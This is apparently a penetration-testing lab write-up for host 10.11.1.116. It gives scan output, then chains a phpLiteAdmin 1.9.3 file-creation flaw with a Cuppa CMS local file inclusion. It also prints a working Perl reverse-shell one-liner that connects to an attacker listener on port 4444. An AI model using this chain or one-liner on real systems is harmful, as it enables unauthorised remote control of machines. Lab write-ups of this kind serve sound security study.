Quick_10.11.1.116.nmap
10.11.1.116
Nmap scan report for 10.11.1.116
Host is up (0.27s latency).
Not shown: 836 closed ports, 158 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
110/tcp  open  pop3
143/tcp  open  imap
3306/tcp open  mysql
MAC Address: 00:50:56:89:1E:9B (VMware)

DirBuster found two web apps on port 80:

one is phpLiteAdmin and the other is Cuppa CMS

phpLiteAdmin v1.9.3 lets you create a database file with any extension, including .php

test.php created in

Cuppa CMS has an LFI vulnerability, which can be used to include that file and execute it on the box

use pkg_info to check the installed packages; perl is installed

use the perl one-liner below (replace attackerip with the listener address; it forks, detaches the parent, connects to attackerip:4444, reopens STDIN/STDOUT on the socket and runs each received line with system):

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

this gives a reverse shell

uname -r shows the OS is FreeBSD 9.0

a kernel privilege escalation exploit was found for it.